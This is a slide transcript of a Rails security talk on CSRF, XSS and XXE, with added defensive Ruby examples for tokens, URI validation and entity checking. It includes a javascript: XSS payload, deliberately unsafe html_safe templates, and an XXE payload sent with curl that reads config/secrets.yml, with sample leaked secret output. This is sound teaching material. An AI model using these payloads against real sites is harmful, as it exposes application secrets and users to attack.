Security is Broken: Understanding Common Vulnerabilities

Mountain West Ruby Conference

Eileen M. Uchitelle

March 21, 2016
Transcript

  1. SECURITY IS BROKEN
    Understanding Common Vulnerabilities

  2. EILEEN M UCHITELLE
    Security, Performance, & Infrastructure
    at Basecamp
    eileencodes.com
    @eileencodes
    @eileencodes
    speakerdeck.com/eileencodes

  3. (image-only slide)

  4. (image-only slide)

  5. OPEN SOURCE
    Rails Committers
    Rails Security

  6. (image-only slide)

  7. (image-only slide)

  8. How is security
    broken?

  9. • Impossible to test for all possible
    vulnerabilities
    How is security broken?

  10. • Impossible to test for all possible
    vulnerabilities
    • Hackers are always one step ahead
    How is security broken?

  11. • Impossible to test for all possible
    vulnerabilities
    • Hackers are always one step ahead
    • Patching one vulnerability can lead to
    exposing new ones
    How is security broken?

  12. How did we get
    here?

  13. • Failed to enforce web standards
    How did we get here?

  14. vs.

  15. (image-only slide)

  16. • Failed to enforce web standards
    • Failed to implement a definition of
    security
    How did we get here?

  17. ...completely failed to come up with
    even the most rudimentary usable
    frameworks for understanding the
    security of modern software.
    – Michal Zalewski, The Tangled Web

  18. • Failed to enforce web standards
    • Failed to implement a definition of
    security
    • Too few people understand the
    vulnerabilities
    How did we get here?

  19. (image-only slide)

  20. CSRF

  21. CSRF
    Cross-Site Request Forgery

  22. EXPLOITING CSRF

  23. (image-only slide)

  24. Name
    Email
    Website

  25. (image-only slide)

  26. Looks the same, different URL

  27. Name
    Email
    Website

  28. Name
    Email
    Website
    Attacker’s email

  29. Name
    Email
    Website
    Auto-submit form

  30. Name
    Email
    Website
    Auto-submit form to victim site

  31. Attacker’s email

  32. How dangerous are
    CSRF attacks?

  33. How to mitigate
    CSRF?

  34. • Use built-in framework CSRF protection
    How to mitigate CSRF?

  35. (image-only slide)

  36. class ApplicationController < ActionController::Base
      protect_from_forgery with: :exception
    end

  37. name=authenticity_token" />
    Name
    Email
    Website
    CSRF protection

  38. Caveat:
    CSRF protection in Rails is
    order-dependent

  39. class ApplicationController < ActionController::Base
      before_action :authenticate
      protect_from_forgery with: :exception,
                           if: -> { authenticate_method.web? }
    end

  40. class ApplicationController < ActionController::Base
      before_action :authenticate
      protect_from_forgery with: :exception,
                           if: -> { authenticate_method.web? }
    end

    class OtherController < ApplicationController
      skip_before_action :authenticate
      before_action :authenticate_method, only: :create
    end

  41. class ApplicationController < ActionController::Base
      before_action :authenticate
      protect_from_forgery with: :exception,
                           if: -> { authenticate_method.web? }
    end

    class OtherController < ActionController::Base
      skip_before_action :authenticate
      before_action :authenticate_method, only: :create
      protect_from_forgery with: :exception,
                           if: -> { authenticate_method.web? }
    end
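
    The ordering problem from slides 38 to 41, modelled in plain Ruby as an added example (not code from the talk or from Rails): a toy controller class with `before_action`, `skip_before_action` and a `protect_from_forgery` stand-in that appends the CSRF check as an ordinary callback, which is the ordering the slides describe. The method names `authenticate_for_create`, `verify_authenticity_token` and `auth_method` are stand-ins chosen for this example. In the broken subclass the inherited check sits earlier in the chain than the subclass's own authentication callback, so its `if:` guard evaluates against state that has not been set yet and the check is skipped; redeclaring the check after that callback, as slide 41 does, puts it back in the chain.

```ruby
# Toy model of before_action ordering for the slides above. It is an added
# example, not Rails's callback implementation: callbacks run in declaration
# order, a subclass starts from a copy of its parent's chain, and
# protect_from_forgery is modelled as an ordinary appended before_action.
class ToyController
  Callback = Struct.new(:name, :only, :guard)

  def self.callbacks
    @callbacks ||= superclass.respond_to?(:callbacks) ? superclass.callbacks.dup : []
  end

  def self.before_action(name, **opts)
    callbacks << Callback.new(name, opts[:only], opts[:if])
  end

  def self.skip_before_action(name)
    callbacks.reject! { |cb| cb.name == name }
  end

  # Stand-in for protect_from_forgery: the CSRF check is just another
  # before_action, appended at the point where it is declared.
  def self.protect_from_forgery(**opts)
    before_action(:verify_authenticity_token, **opts)
  end

  attr_reader :auth_method

  def initialize(action)
    @action = action
    @ran = []
  end

  # Runs the chain for one action and returns the callbacks that executed.
  def run
    self.class.callbacks.each do |cb|
      next if cb.only && cb.only != @action
      next if cb.guard && !instance_exec(&cb.guard) # guard sees current state only
      send(cb.name)
    end
    @ran
  end

  # Hypothetical authentication callbacks; both mark the request as a
  # browser (session) request, which is when a CSRF check is required.
  def authenticate
    @auth_method = :web
    @ran << :authenticate
  end

  def authenticate_for_create
    @auth_method = :web
    @ran << :authenticate_for_create
  end

  def verify_authenticity_token
    @ran << :verify_authenticity_token
  end
end

# Slide 39: authenticate first, then the CSRF check guarded on how the
# request authenticated.
class AppController < ToyController
  before_action :authenticate
  protect_from_forgery if: -> { auth_method == :web }
end

# Slide 40: the subclass swaps in its own authentication callback, but the
# inherited CSRF check is already earlier in the chain than that callback.
class BrokenOtherController < AppController
  skip_before_action :authenticate
  before_action :authenticate_for_create, only: :create
end

# Slide 41: declare the CSRF check after the callback its guard depends on.
class FixedOtherController < ToyController
  before_action :authenticate_for_create, only: :create
  protect_from_forgery if: -> { auth_method == :web }
end

def callback_order_demo
  {
    app:    AppController.new(:create).run,         # [:authenticate, :verify_authenticity_token]
    broken: BrokenOtherController.new(:create).run, # [:authenticate_for_create] -- no CSRF check ran
    fixed:  FixedOtherController.new(:create).run   # [:authenticate_for_create, :verify_authenticity_token]
  }
end
```

    The `broken` result is the silent failure mode: nothing raises, the request is authenticated, and the forgery check simply never runs. A test that asserts the CSRF callback executed for each authenticated action is the cheapest way to notice this kind of regression.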

  42. (image-only slide)

  43. • Use built-in framework CSRF protection
    • Rails 5 supports per-form tokens
    How to mitigate CSRF?

  44. • Use built-in framework CSRF protection
    • Rails 5 supports per-form tokens
    • Refresh tokens with the session / don’t
    reuse tokens
    How to mitigate CSRF?

  45. class SessionsController < ApplicationController
      def destroy
        sign_out
        reset_session
        redirect_to sign_in_url
      end
    end
    Refreshes Authenticity Token

  46. • Use built-in framework CSRF protection
    • Rails 5 supports per-form tokens
    • Refresh tokens with the session / don’t
    reuse tokens
    • Mitigate XSS attacks
    How to mitigate CSRF?
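
    The token mechanics behind slides 36, 43, 44 and 45, as an added example in plain Ruby (written for this transcript in the spirit of the Rails scheme, not Rails's own code): the session holds one random secret, every rendered form gets a fresh one-time mask so the visible token changes per render, a per-form token additionally binds the secret to the action path and HTTP verb, verification is constant-time, and resetting the session invalidates every token issued before it. `CsrfToken`, `csrf_token_demo` and the `/comments` and `/users` paths are names chosen here; `session` is a plain Hash standing in for the session store.

```ruby
require 'securerandom'
require 'digest'

# Session-bound, masked, optionally per-form CSRF tokens. Added example, not
# Rails's own implementation.
module CsrfToken
  TOKEN_LENGTH = 32

  # Issue the per-session secret once; `session` is a Hash standing in for the
  # session store.
  def self.session_secret(session)
    session[:_csrf_token] ||= SecureRandom.random_bytes(TOKEN_LENGTH)
  end

  # Token to embed in a form. With action and method given it is a per-form
  # token (slide 43): bound to that path and verb, so it fails on other forms.
  def self.form_token(session, action: nil, method: nil)
    mask = SecureRandom.random_bytes(TOKEN_LENGTH)
    [mask + xor(expected_secret(session_secret(session), action, method), mask)].pack('m0')
  end

  # True only if `token` unmasks to this session's secret for this form.
  def self.valid?(session, token, action: nil, method: nil)
    secret = session[:_csrf_token]
    return false unless secret                       # no secret issued yet
    raw = token.to_s.unpack1('m0')                   # strict Base64 decode
    return false unless raw.bytesize == 2 * TOKEN_LENGTH
    mask   = raw.byteslice(0, TOKEN_LENGTH)
    masked = raw.byteslice(TOKEN_LENGTH, TOKEN_LENGTH)
    secure_compare(xor(masked, mask), expected_secret(secret, action, method))
  rescue ArgumentError                               # malformed Base64
    false
  end

  # Slide 45: resetting the session discards the secret, so every token
  # issued before the reset stops verifying.
  def self.reset_session(session)
    session.clear
  end

  # Per-form binding: fold the action path and verb into the secret.
  def self.expected_secret(secret, action, method)
    return secret unless action
    xor(secret, Digest::SHA256.digest("#{action}##{method.to_s.downcase}"))
  end

  def self.xor(a, b)
    a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
  end

  # Constant-time comparison: no early exit on the first differing byte.
  def self.secure_compare(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end

# Walks through the checks a verifier performs; every value is true or false.
def csrf_token_demo
  session = {}
  token   = CsrfToken.form_token(session, action: '/comments', method: :post)
  other_session = { _csrf_token: SecureRandom.random_bytes(CsrfToken::TOKEN_LENGTH) }
  results = {
    same_form:     CsrfToken.valid?(session, token, action: '/comments', method: :post),
    other_form:    CsrfToken.valid?(session, token, action: '/users', method: :post),
    other_session: CsrfToken.valid?(other_session, token, action: '/comments', method: :post),
    malformed:     CsrfToken.valid?(session, 'not-a-token'),
    # two renders of the same form give different strings that both verify
    fresh_mask:    CsrfToken.form_token(session) != CsrfToken.form_token(session) &&
                   CsrfToken.valid?(session, CsrfToken.form_token(session))
  }
  CsrfToken.reset_session(session)
  results[:after_logout] = CsrfToken.valid?(session, token, action: '/comments', method: :post)
  results
end
```

    The masking is what makes "don't reuse tokens" cheap: the secret itself is never written into a page, so two forms on the same page carry different strings, and the per-form variant means a token lifted from one form is worthless against another.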

  47. XSS

  48. XSS
    Cross-Site Scripting

  49. EXPLOITING STORED
    XSS

  50. (image-only slide)

  51. (image-only slide)

  52. Escaped HTML

  53. Profile
    <%= notice %>
    Name:
    <%= @user.name %>
    Email:
    <%= @user.email %>
    Website:
    <%= link_to('website', @user.website) %>
    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>

  54. Profile
    <%= notice %>
    Name:
    <%= (@user.name).html_safe %>
    Email:
    <%= @user.email %>
    Website:
    <%= link_to('website', @user.website) %>
    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>

  55. Unescaped HTML

  56. JavaScript Scheme

  57. (image-only slide)

  58. javascript://example.com/%0Aalert(1)

  59. example.com/%0Aalert(1)
    JavaScript Scheme
    javascript://

  60. javascript://example.com/%0Aalert(1)
    URL
    example.com

  61. Percent encoded “line feed”
    javascript://example.com/%0Aalert(1)
    %0A

  62. JavaScript Alert
    javascript://example.com/%0Aalert(1)
    alert(1)

  63. How dangerous are
    XSS attacks?

  64. How to mitigate
    XSS?

  65. • Always escape user-provided data
    How to mitigate XSS?

  66. Profile
    <%= notice %>
    Name:
    <%= (@user.name).html_safe %>
    Email:
    <%= @user.email %>
    Website:
    <%= link_to('website', @user.website) %>
    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    Don’t do this

  67. (image-only slide)

  68. • Don’t HTML escape user-provided data
    • Sanitize user-provided data
    How to mitigate XSS?

  69. Profile
    <%= notice %>
    Name:
    <%= sanitize(@user.name) %>
    Email:
    <%= @user.email %>
    Website:
    <%= link_to('website', @user.website) %>
    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    Will strip out unwanted tags and attributes

  70. • Don’t HTML escape user-provided data
    • Sanitize user-provided data
    • Validate user-provided data
    How to mitigate XSS?

  71. class User < ActiveRecord::Base
      WHITELISTED_URI_SCHEMES = %w( http https )

      validate :check_uri_scheme

      private

      def check_uri_scheme
        begin
          uri = URI.parse(website)
          # uri.scheme is nil for input such as "example.com"; to_s keeps
          # downcase from raising there, so the scheme check rejects it
          unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.to_s.downcase)
            errors.add :website, 'is not an allowed URI scheme'
          end
        rescue URI::InvalidURIError
          errors.add :website, 'is not a valid URI'
        end
      end
    end
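
    The same scheme rule as a stand-alone Ruby check, added here as an example (not code from the talk), covering the inputs a validator has to get right: the `javascript:` URL from slides 58 to 62, an upper-case scheme, a URL with no scheme at all (`URI.parse('example.com')` returns a nil scheme), surrounding whitespace, and an unparseable string. `render_link` then shows why this is validation work rather than escaping work: HTML escaping neutralises markup in the link text and attribute, but it cannot change what a browser does with the href's scheme. `ALLOWED_URI_SCHEMES`, `website_error` and `render_link` are names chosen for this example.

```ruby
require 'uri'
require 'cgi'

ALLOWED_URI_SCHEMES = %w[http https].freeze

# Returns nil when the value is acceptable as an href, otherwise the reason it
# is rejected. Added example, not project code.
def website_error(value)
  uri = URI.parse(value.to_s.strip)
  scheme = uri.scheme
  return 'is missing a URI scheme' if scheme.nil?          # e.g. "example.com"
  return 'is not an allowed URI scheme' unless ALLOWED_URI_SCHEMES.include?(scheme.downcase)
  nil
rescue URI::InvalidURIError
  'is not a valid URI'
end

# Escaping (what <%= %> does by default) protects the text and the attribute
# value; the scheme check protects what the link does when clicked.
def render_link(text, href)
  error = website_error(href)
  raise ArgumentError, "website #{error}" if error
  %(<a href="#{CGI.escapeHTML(href.strip)}">#{CGI.escapeHTML(text)}</a>)
end

# Constructed inputs, each paired with the verdict a validator should reach.
def website_error_demo
  {
    'https://example.com'                   => website_error('https://example.com'),
    '  https://example.com  '               => website_error('  https://example.com  '),
    'javascript://example.com/%0Aalert(1)'  => website_error('javascript://example.com/%0Aalert(1)'),
    'JAVASCRIPT:alert(1)'                   => website_error('JAVASCRIPT:alert(1)'),
    'example.com'                           => website_error('example.com'),
    'http://exa mple.com'                   => website_error('http://exa mple.com')
  }
end
```

    Note that `javascript://example.com/%0Aalert(1)` is a perfectly well-formed URI: it parses without error and has a scheme, so only the allow-list rejects it. A denylist of "bad" schemes would have to keep up with every scheme a browser executes; allowing `http` and `https` does not.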

  74. XXE

  75. XXE
    XML eXternal Entity Attack


  76. ]>

    Groceries
    Take Arya to the vet
    &ext1;
    Pick up beer
    Get car oil changed

    View Slide



  77. ]>

    Groceries
    Take Arya to the vet
    &ext1;
    Pick up beer
    Get car oil changed

    Entity reference

    View Slide


  78. Book flight to Salt Lake City
    Finish Security is Broken Talk

  79. Groceries
    Take Arya to the vet
    Book flight to Salt Lake City
    Finish Security is Broken Talk
    Pick up beer
    Get car oil changed

  80. EXPLOITING XXE
    with cURL

  81. class UsersController < ApplicationController
      def create
        @user = User.new(user_params)
        respond_to do |format|
          if @user.save
            format.html { redirect_to @user }
            format.xml { render :xml => @user.to_xml }
          else
            format.html { render :new }
            format.xml { render xml: @user.errors.to_xml }
          end
        end
      end
    end

  82. class UsersController < ApplicationController
      def create
        @user = User.new(user_params)
        respond_to do |format|
          if @user.save
            format.html { redirect_to @user }
            format.xml { render :xml => @user.to_xml }
          else
            format.html { render :new }
            format.xml { render xml: @user.errors.to_xml }
          end
        end
      end
    end
    XML

  83. config/secrets.yml">
    ]>
    &name;

  84. config/secrets.yml">
    ]>
    &name;
    Requested file

  85. config/secrets.yml">
    ]>
    &name;
    Entity

  86. curl -X 'POST' \
      -H 'Content-Type: application/xml' \
      -d @xxe.xml \
      http://vulnerablesite.com/users.xml
    POST request to users create

  87. curl -X 'POST' \
      -H 'Content-Type: application/xml' \
      -d @xxe.xml \
      http://vulnerablesite.com/users.xml
    Payload

  88. curl -X 'POST' \
      -H 'Content-Type: application/xml' \
      -d @xxe.xml \
      http://vulnerablesite.com/users.xml

    ...
    production:
      secret_key_base:
        271a389cf7bf7b4ff18af3e809241603802b5ff1617b5432a41ff0f99d5
        f29c897db7f07a9cebd9e3a3535301720c0b19ac4eb82afa505ed229c40
        00e166a9a5
    ...
    User’s Name

  89. (image-only slide)

  90. How dangerous are
    XXE attacks?

  91. (image-only slide)

  92. How to mitigate
    XXE?

  93. • Don’t parse XML
    How to mitigate XXE?

  94. Don’t parse XML

  95. • Don’t parse XML
    • Don’t use parsers that allow entity
    replacement (LibXML)
    How to mitigate XXE?

  96. >> LibXML::XML.default_substitute_entities
    >> true

  97. • Don’t parse XML
    • Don’t use parsers that allow entity
    replacement (LibXML)
    • Whitelist known entities
    How to mitigate XXE?
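
    The "whitelist known entities" item as a pre-parse check, added here as an example rather than code from the talk: before a document reaches any XML parser, refuse it if its DTD declares an external (SYSTEM or PUBLIC) entity, and refuse references to any entity that is neither one of the five predefined XML entities nor on an explicit allow-list. The three sample documents are constructed for this example, and the file path in the second one is a placeholder. This complements turning entity substitution off in the parser (slide 96); it does not replace it.

```ruby
# Pre-parse XXE guard: reject external entity declarations and unknown entity
# references before any XML parser sees the document. Added example, not
# project code; it supplements, rather than replaces, parser-level settings.
PREDEFINED_ENTITIES = %w[amp lt gt quot apos].freeze

# <!ENTITY name SYSTEM "..."> and <!ENTITY name PUBLIC "..." "...">,
# including parameter entities (<!ENTITY % name ...>).
EXTERNAL_ENTITY_DECL = /<!ENTITY\s+%?\s*[^\s>]+\s+(?:SYSTEM|PUBLIC)\b/i
# Named references such as &ext1; (character references like &#39; excluded).
ENTITY_REFERENCE     = /&([A-Za-z_][\w.-]*);/

# Returns a list of problems; an empty list means the document may be parsed.
def xml_entity_problems(xml, allowed_entities: [])
  problems = []
  problems << 'declares an external entity' if xml.match?(EXTERNAL_ENTITY_DECL)
  allowed = PREDEFINED_ENTITIES + allowed_entities.map(&:to_s)
  unknown = xml.scan(ENTITY_REFERENCE).flatten.uniq - allowed
  problems << "references unknown entities: #{unknown.join(', ')}" unless unknown.empty?
  problems
end

# Constructed sample: no DTD, only a predefined entity.
SAFE_XML = <<~XML
  <?xml version="1.0"?>
  <todos>
    <item>Groceries</item>
    <item>Take Arya to the vet &amp; pick up beer</item>
  </todos>
XML

# Constructed sample shaped like the slides' external-entity document; the
# file path is a placeholder, not a real target.
EXTERNAL_ENTITY_XML = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE todos [
    <!ENTITY ext1 SYSTEM "file:///path/to/some/file">
  ]>
  <todos>
    <item>Groceries</item>
    &ext1;
  </todos>
XML

# Constructed sample with a harmless internal entity: fine only if the
# application has decided in advance that "owner" is an entity it expects.
INTERNAL_ENTITY_XML = <<~XML
  <?xml version="1.0"?>
  <!DOCTYPE todos [ <!ENTITY owner "Eileen"> ]>
  <todos><item>&owner;: Finish Security is Broken talk</item></todos>
XML

def xxe_guard_demo
  {
    safe:             xml_entity_problems(SAFE_XML),
    external:         xml_entity_problems(EXTERNAL_ENTITY_XML),
    internal_unknown: xml_entity_problems(INTERNAL_ENTITY_XML),
    internal_allowed: xml_entity_problems(INTERNAL_ENTITY_XML, allowed_entities: ['owner'])
  }
end
```

    The check is deliberately stricter than the XML specification: an unexpected entity name is rejected even when it is declared internally, because the application, not the sender, should decide which entities are meaningful. Logging the rejected declarations gives a simple detection signal for XXE probing against an endpoint that accepts XML.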

  98. Investigate vulnerabilities & patches
    SECURITY

  99. owasp.org

  100. Resilience & empowerment
    SECURITY

  101. (image-only slide)

  102. GitHub

    eileencodes/security_examples

  103. Awareness of vulnerabilities
    SECURITY

  104. (image-only slide)

  105. To the future

  106. EILEEN M UCHITELLE
    Security, Performance, & Infrastructure
    at Basecamp
    eileencodes.com
    @eileencodes
    @eileencodes
    speakerdeck.com/eileencodes
